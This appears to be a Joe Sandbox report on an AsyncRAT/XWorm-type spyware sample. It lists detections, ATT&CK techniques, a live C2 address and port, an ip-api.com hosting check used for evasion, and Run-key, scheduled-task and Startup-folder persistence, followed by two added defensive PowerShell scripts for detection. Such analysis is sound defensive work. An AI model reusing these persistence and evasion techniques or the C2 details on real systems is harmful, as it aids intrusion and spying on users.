                      Source: Yara match | File source: 0.2.file.exe.2a61cd8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.0.file.exe.630000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.3408817500.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.3408817500.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: file.exe PID: 2968, type: MEMORYSTR
                      Source: Yara match | File source: C:\Users\user\AppData\Roaming\java.exe, type: DROPPED
                      MITRE ATT&CK Matrix (one column per tactic; a number in brackets is the count badge shown next to a matched technique)

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | [1] Windows Management Instrumentation | [1] DLL Side-Loading | [1] DLL Side-Loading | [11] Disable or Modify Tools | OS Credential Dumping | [1] File and Directory Discovery | Remote Services | [11] Archive Collected Data | [1] Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | [1] Scheduled Task/Job | [1] Scheduled Task/Job | [11] Process Injection | [1] Deobfuscate/Decode Files or Information | LSASS Memory | [33] System Information Discovery | Remote Desktop Protocol | [1] Screen Capture | [1] Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | [1] PowerShell | [121] Registry Run Keys / Startup Folder | [1] Scheduled Task/Job | [2] Obfuscated Files or Information | Security Account Manager | [441] Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | [1] Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | [121] Registry Run Keys / Startup Folder | [2] Software Packing | NTDS | [1] Process Discovery | Distributed Component Object Model | Input Capture | [2] Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | [1] DLL Side-Loading | LSA Secrets | [61] Virtualization/Sandbox Evasion | SSH | Keylogging | [12] Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | [11] Masquerading | Cached Domain Credentials | [1] Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | [1] Modify Registry | DCSync | [1] System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | [61] Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | [11] Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      Behavior Graph (rendered as an image in the report; the node information recoverable from it follows)
                      Behavior Graph ID: 1565291 | Sample: file.exe | Startdate: 29/11/2024 | Architecture: WINDOWS | Score: 100
                      DNS/IP nodes at the top level: ip-api.com; g-bing-com.ax-0001.ax-msedge.net; ax-0001.ax-msedge.net
                      Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
                      Processes started: file.exe [16 6]; java.exe; svchost.exe; 3 other processes
                      file.exe network: 103.230.121.124, 49884, 49986, 7000 VPSQUANUS Hong Kong; ip-api.com 208.95.112.1, 49712, 80 TUT-ASUS United States
                      file.exe dropped: C:\Users\user\AppData\Roaming\java.exe, PE32
                      file.exe signatures: Protects its processes via BreakOnTermination flag; Creates autostart registry keys to launch java; Bypasses PowerShell execution policy; 3 other signatures
                      file.exe started: powershell.exe [23] (three instances); 2 other processes
                      java.exe signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                      svchost.exe network: 127.0.0.1 unknown unknown
                      powershell.exe signature: Loading BitLocker PowerShell Module
                      powershell.exe and the 2 other processes each started conhost.exe (five conhost.exe nodes in total)

                      Source | Detection | Scanner | Label | Link
                      file.exe | 82% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
                      file.exe | 100% | Avira | TR/Spy.Gen |
                      file.exe | 100% | Joe Sandbox ML | |
                      Source | Detection | Scanner | Label | Link
                      C:\Users\user\AppData\Roaming\java.exe | 100% | Avira | TR/Spy.Gen |
                      C:\Users\user\AppData\Roaming\java.exe | 100% | Joe Sandbox ML | |
                      C:\Users\user\AppData\Roaming\java.exe | 82% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      http://crl.mwrr | 0% | Avira URL Cloud | safe |
                      103.230.121.124 | 0% | Avira URL Cloud | safe |
                      http://www.microsof. | 0% | Avira URL Cloud | safe |
                      http://crl.mEk | 0% | Avira URL Cloud | safe |
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      ip-api.com | 208.95.112.1 | true | false | | high
                      ax-0001.ax-msedge.net | 150.171.28.10 | true | false | | high
                      Name | Malicious | Antivirus Detection | Reputation
                      103.230.121.124 | true | Avira URL Cloud: safe | unknown
                      http://ip-api.com/line/?fields=hosting | false | | high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2215164794.000001A95E38F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2344886418.00000283B7450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2535136139.000001603D3E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2188717626.000001A94E548000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A7608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D599000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.microsoft.copowershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Licensepowershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.micpowershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Iconpowershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
https://g.live.com/odclientsettings/ProdV21C: | Source: svchost.exe, 0000000C.00000003.2419893569.0000014D507F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.12.dr | Malicious: false | Reputation: high
http://crl.ver) | Source: svchost.exe, 0000000C.00000002.3404757837.0000014D50A00000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://crl.mwrr | Source: powershell.exe, 00000010.00000002.2788544473.000001AA3FCE5000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Antivirus: Avira URL Cloud: safe | Reputation: unknown
https://github.com/Pester/Pester | Source: powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://g.live.com/odclientsettings/Prod1C: | Source: edb.log.12.dr | Malicious: false | Reputation: high
http://schemas.xmlsoap.org/wsdl/ | Source: powershell.exe, 00000002.00000002.2188717626.000001A94E548000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A7608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D599000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27748000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://contoso.com/ | Source: powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://nuget.org/nuget.exe | Source: powershell.exe, 00000002.00000002.2215164794.000001A95E38F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2344886418.00000283B7450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2535136139.000001603D3E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2743903646.000001AA3758E000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://go.microsoft.c | Source: powershell.exe, 00000010.00000002.2604852851.000001AA25B77000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://go.microsoft.ctain | Source: powershell.exe, 00000010.00000002.2604852851.000001AA25B77000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://www.microsof. | Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Antivirus: Avira URL Cloud: safe | Reputation: unknown
http://crl.micft.cMicRosof | Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
https://aka.ms/pscore68 | Source: powershell.exe, 00000002.00000002.2188717626.000001A94E321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A73E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27521000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://www.microsoft.c | Source: powershell.exe, 0000000A.00000002.2565979792.0000016045A79000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Source: file.exe, 00000000.00000002.3408817500.0000000002991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2188717626.000001A94E321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2258347917.00000283A73E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2410917342.000001602D371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2608646388.000001AA27521000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
http://crl.mEk | Source: powershell.exe, 0000000A.00000002.2565979792.00000160459C0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Antivirus: Avira URL Cloud: safe | Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
103.230.121.124 | unknown | Hong Kong | 62468 | VPSQUANUS | true
                                                                        IP
                                                                        127.0.0.1
                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1565291
                                                                        Start date and time:2024-11-29 15:18:07 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 6m 23s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:24
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:file.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@21/25@1/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 11.1%
                                                                        HCA Information:
                                                                        • Successful, ratio: 98%
                                                                        • Number of executed functions: 128
                                                                        • Number of non-executed functions: 7
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                                                        • Excluded IPs from analysis (whitelisted): 2.23.161.164
                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
                                                                        • Execution Graph export aborted for target java.exe, PID 3088 because it is empty
                                                                        • Execution Graph export aborted for target java.exe, PID 3428 because it is empty
                                                                        • Execution Graph export aborted for target java.exe, PID 6464 because it is empty
                                                                        • Execution Graph export aborted for target java.exe, PID 7016 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 3360 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 4512 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 5932 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6116 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • VT rate limit hit for: file.exe
Time | Type | Description
09:18:59 | API Interceptor | 184x Sleep call for process: file.exe modified
09:19:02 | API Interceptor | 60x Sleep call for process: powershell.exe modified
09:19:28 | API Interceptor | 2x Sleep call for process: svchost.exe modified
09:20:09 | API Interceptor | 4x Sleep call for process: java.exe modified
15:20:09 | Task Scheduler | Run new task: java path: C:\Users\user\AppData\Roaming\java.exe
15:20:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run java C:\Users\user\AppData\Roaming\java.exe
15:20:18 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run java C:\Users\user\AppData\Roaming\java.exe
15:20:26 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.lnk
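The timeline above records three persistence points for the dropped payload: a scheduled task named java, a Run value named java under HKCU (listed in both the HKCU and HKCU64 views), and a java.lnk in the user's Startup folder. The PowerShell below checks all three on a suspect host and hashes the payload so the value can be compared with the report's dropped-file section. It is an added example and not code from the Joe Sandbox report; the task name, value name and %APPDATA%\java.exe path are taken from the timeline, while the output layout is this script's own choice.

```powershell
# Added example, not code from the Joe Sandbox report. Checks the three
# persistence locations the report's timeline records for this sample.
# Assumptions: task name, Run value name and payload path are taken from the
# timeline; the output object shape is this script's own.
param(
    [string]$TaskName     = 'java',
    [string]$RunValueName = 'java',
    [string]$PayloadPath  = (Join-Path $env:APPDATA 'java.exe')
)

$findings = [System.Collections.Generic.List[object]]::new()

# 1. Run value under HKCU, read through both the 64-bit and the 32-bit registry
#    view because the report lists the entry under HKCU and HKCU64.
foreach ($view in [Microsoft.Win32.RegistryView]::Registry64, [Microsoft.Win32.RegistryView]::Registry32) {
    $hive = [Microsoft.Win32.RegistryKey]::OpenBaseKey([Microsoft.Win32.RegistryHive]::CurrentUser, $view)
    $key  = $hive.OpenSubKey('Software\Microsoft\Windows\CurrentVersion\Run')
    if ($key) {
        $data = $key.GetValue($RunValueName)
        if ($data) {
            $findings.Add([pscustomobject]@{ Type = "RunKey ($view)"; Name = $RunValueName; Target = [string]$data })
        }
        $key.Close()
    }
    $hive.Close()
}

# 2. Scheduled task with the same name; record every action it carries.
$task = Get-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
if ($task) {
    foreach ($action in @($task.Actions)) {
        if ($action.Execute) {
            $findings.Add([pscustomobject]@{
                Type   = 'ScheduledTask'
                Name   = $task.TaskPath + $task.TaskName
                Target = ($action.Execute + ' ' + $action.Arguments).Trim()
            })
        }
    }
}

# 3. Shortcuts in the user's Startup folder, resolved through WScript.Shell so
#    the .lnk target is compared rather than the shortcut's file name.
$startup = [Environment]::GetFolderPath('Startup')
$shell   = New-Object -ComObject WScript.Shell
foreach ($lnk in Get-ChildItem -Path $startup -Filter '*.lnk' -ErrorAction SilentlyContinue) {
    $target = $shell.CreateShortcut($lnk.FullName).TargetPath
    if ($target) {
        $findings.Add([pscustomobject]@{ Type = 'StartupLnk'; Name = $lnk.Name; Target = $target })
    }
}

# 4. Only entries that launch the dropped payload matter; hash it so the value
#    can be compared with the dropped-file section of the report.
$payloadHash = if (Test-Path -LiteralPath $PayloadPath) {
    (Get-FileHash -LiteralPath $PayloadPath -Algorithm SHA256).Hash
} else { 'payload not present' }

$findings |
    Where-Object { $_.Target -match [regex]::Escape($PayloadPath) } |
    Select-Object Type, Name, Target, @{ n = 'PayloadSHA256'; e = { $payloadHash } } |
    Format-Table -AutoSize
```

Run it in the context of the user whose profile was infected, because all three locations are per-user (HKCU and the user's own Startup folder); running it elevated from another account inspects the wrong hive and folder. The script matches on the resolved target path rather than on the name java, since the name is trivially changed between builds while the Startup and Run locations are what the sample actually relies on.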
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | Enquiry.js | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | 8FloezlGW7.exe | malicious | Python Stealer, Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | Orden de compra.pdf______________________________________.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | word.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | svchost.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | Chrome.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | Registry.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | OC LICITACI#U00d3N DICIEMBRE_24.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | VzhY4BcvBH.exe | malicious | AsyncRAT, RedLine, StormKitty, VenomRAT | ip-api.com/line/?fields=hosting
103.230.121.124 | word.exe | malicious | XWorm | (none)
103.230.121.124 | svchost.exe | malicious | XWorm | (none)
103.230.121.124 | Chrome.exe | malicious | XWorm | (none)
103.230.121.124 | Registry.exe | malicious | XWorm | (none)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | Enquiry.js | malicious | AgentTesla | 208.95.112.1
ip-api.com | 8FloezlGW7.exe | malicious | Python Stealer, Blank Grabber | 208.95.112.1
ip-api.com | https://www.scrolldroll.com/best-dialogues-from-asur/ | malicious | Unknown | 208.95.112.2
ip-api.com | Orden de compra.pdf______________________________________.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | word.exe | malicious | XWorm | 208.95.112.1
ip-api.com | svchost.exe | malicious | XWorm | 208.95.112.1
ip-api.com | Chrome.exe | malicious | XWorm | 208.95.112.1
ip-api.com | Registry.exe | malicious | XWorm | 208.95.112.1
ip-api.com | OC LICITACI#U00d3N DICIEMBRE_24.exe | malicious | AgentTesla | 208.95.112.1
ax-0001.ax-msedge.net | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim | 150.171.28.10
ax-0001.ax-msedge.net | setup#U4f01#U4e1a#U540d#U5355.exe | malicious | Unknown | 150.171.27.10
ax-0001.ax-msedge.net | https://aysesuretobea.com/ | malicious | Unknown | 150.171.27.10
ax-0001.ax-msedge.net | file.exe | malicious | Credential Flusher | 150.171.27.10
ax-0001.ax-msedge.net | Scan_19112024_people_power_press.pdf | malicious | Unknown | 150.171.27.10
ax-0001.ax-msedge.net | CC_scan.pdf.lnk.download.lnk | malicious | Unknown | 150.171.27.10
ax-0001.ax-msedge.net | file.exe | malicious | Amadey, Stealc, Vidar | 150.171.27.10
ax-0001.ax-msedge.net | 22.exe | malicious | Unknown | 150.171.28.10
ax-0001.ax-msedge.net | No. I20220052.exe | malicious | FormBook | 150.171.27.10
ax-0001.ax-msedge.net | https://www.google.rs/url?q=160CHARtTPSJ3J3wDyycT&sa=t&esrc=TYsrCFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=HARlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/aloperdehatti.com/on/wTARVgfa92/%61%6C%65%73%73%69%61%2E%64%61%6E%69%65%6C%65%40%74%6F%6E%69%6E%63%61%73%61%2E%69%74&ugs=n8CoFFz5hZ4Yaxn3ZJryvKlaQxQ-BOyvjZ0GlahI9shjnWfTZ1du_w== | malicious | Unknown | 150.171.27.10
Match | Associated Sample Name / URL | Detection | Threat Name | Context
VPSQUANUS | word.exe | malicious | XWorm | 103.230.121.124
VPSQUANUS | svchost.exe | malicious | XWorm | 103.230.121.124
VPSQUANUS | Chrome.exe | malicious | XWorm | 103.230.121.124
VPSQUANUS | Registry.exe | malicious | XWorm | 103.230.121.124
VPSQUANUS | qkbfi86.elf | malicious | Mirai | 103.252.19.63
VPSQUANUS | amen.arm.elf | malicious | Unknown | 43.225.59.17
VPSQUANUS | AIYi17AyGz.exe | malicious | Metasploit, Meterpreter | 198.44.176.141
VPSQUANUS | o88dYvhfkt.exe | malicious | CobaltStrike, Metasploit | 156.224.21.148
VPSQUANUS | file.exe | malicious | Sliver | 198.44.168.104
VPSQUANUS | sBX8VM67ZE.exe | malicious | FormBook | 23.251.54.212
TUT-ASUS | Enquiry.js | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 8FloezlGW7.exe | malicious | Python Stealer, Blank Grabber | 208.95.112.1
TUT-ASUS | https://www.scrolldroll.com/best-dialogues-from-asur/ | malicious | Unknown | 208.95.112.2
TUT-ASUS | Orden de compra.pdf______________________________________.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | word.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | svchost.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | Chrome.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | Registry.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | OC LICITACI#U00d3N DICIEMBRE_24.exe | malicious | AgentTesla | 208.95.112.1
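The IP table marks ip-api.com (208.95.112.1, TUT-ASUS) as not malicious and 103.230.121.124 (VPSQUANUS, Hong Kong) as the malicious endpoint, and the context rows show that the related XWorm samples all issue the same ip-api.com/line/?fields=hosting lookup, the data-center check, while the C2 address is shared only with other XWorm samples. The PowerShell function below, an added example that is not part of the Joe Sandbox report, turns that into a sequence rule over flow-log lines: the hosting lookup alone is noise, the lookup followed by traffic to the C2 from the same source host is the alert. The log format, the ports and the four sample lines are constructed for this example; only the two IP addresses and the ip-api.com path come from the report.

```powershell
# Added example, not code from the Joe Sandbox report. The two addresses and the
# ip-api.com path come from the report's IP and context tables; the flow-log
# format, the ports and the sample lines below are constructed.
function Find-XWormNetworkIndicators {
    param([Parameter(Mandatory)][string[]]$LogLines)

    $c2Addresses  = @('103.230.121.124')
    $hostingCheck = [regex]'^https?://ip-api\.com/(line|json)/\?fields=hosting'

    # Constructed flow-log format: <ISO timestamp> <src-ip> <dst-ip> <dst-port> <url or ->
    $events = foreach ($line in $LogLines) {
        $parts = $line -split '\s+', 5
        if ($parts.Count -lt 5) { continue }
        [pscustomobject]@{
            Time           = [datetime]$parts[0]
            Src            = $parts[1]
            Dst            = $parts[2]
            Url            = $parts[4]
            IsHostingCheck = $hostingCheck.IsMatch($parts[4])
            IsC2           = $c2Addresses -contains $parts[2]
        }
    }

    # ip-api.com is a legitimate service and the report itself marks it
    # non-malicious, so the lookup alone is not an alert. Per source host, a
    # hosting check followed by C2 traffic scores high; C2 traffic without the
    # preceding check still fires, at a lower severity.
    foreach ($group in ($events | Group-Object Src)) {
        $byTime = $group.Group | Sort-Object Time
        $check  = $byTime | Where-Object IsHostingCheck | Select-Object -First 1
        $c2     = $byTime | Where-Object IsC2 | Select-Object -First 1
        if (-not $c2) { continue }
        [pscustomobject]@{
            Src          = $group.Name
            C2           = $c2.Dst
            FirstC2      = $c2.Time
            HostingCheck = $(if ($check) { $check.Time } else { $null })
            Severity     = $(if ($check -and $check.Time -le $c2.Time) { 'high' } else { 'medium' })
        }
    }
}

# Constructed sample lines (not from the report's capture): one host does the
# hosting check and then reaches the C2, one only does a different ip-api.com
# lookup, one reaches the C2 without any preceding check.
$sampleLog = @(
    '2024-11-29T15:19:30 10.0.0.5 208.95.112.1 80 http://ip-api.com/line/?fields=hosting'
    '2024-11-29T15:19:31 10.0.0.5 103.230.121.124 7000 -'
    '2024-11-29T15:20:02 10.0.0.9 208.95.112.1 80 http://ip-api.com/json/?fields=225545'
    '2024-11-29T15:21:10 10.0.0.7 103.230.121.124 7000 -'
)
Find-XWormNetworkIndicators -LogLines $sampleLog | Format-Table -AutoSize
```

On the constructed input this yields a high-severity row for 10.0.0.5, a medium row for 10.0.0.7 and nothing for 10.0.0.9, which is the intended behaviour: the hosting check is an early-stage signal that sharpens the C2 hit, not an indicator on its own. Swap the address list for the current C2 set when reusing the rule; the report shows the same VPSQUANUS address across several XWorm samples, but a single IP is a short-lived indicator.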
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.7263175011378977
                                                                                Encrypted:false
                                                                                SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0Z:9JZj5MiKNnNhoxuk
                                                                                MD5:FAA9F84C5D684D3E06B84FAB002F817D
                                                                                SHA1:BF1F8BDB002A1BD3431B351FE0A3F8EC8E772E9B
                                                                                SHA-256:C40BD5AAE054D17CE6F760B95F56C48A20B69A0BF18C5388FB762AE36ED6B7C5
                                                                                SHA-512:6B103B4EC0F6799160DA474C4D4BA4A0BF39566D12915D4083328BFA0A2D482195ABCDB81260FC8C28056028456B76DED26F8253710B0E4AA76BE2D92411D099
                                                                                Malicious:false
                                                                                Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:Extensible storage user DataBase, version 0x620, checksum 0xe3e9a350, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                Category:dropped
                                                                                Size (bytes):1310720
                                                                                Entropy (8bit):0.7556072070252107
                                                                                Encrypted:false
                                                                                SSDEEP:1536:tSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:tazaSvGJzYj2UlmOlOL
                                                                                MD5:EF48379D182646658C3C48EC7A03D37E
                                                                                SHA1:F3435C1178B13B0100DAC1A1CDDCF17AF76D50B4
                                                                                SHA-256:83C9CDCF6B0CC5133B7D4584698B85B98A1034B81370857B504540D65C549DB4
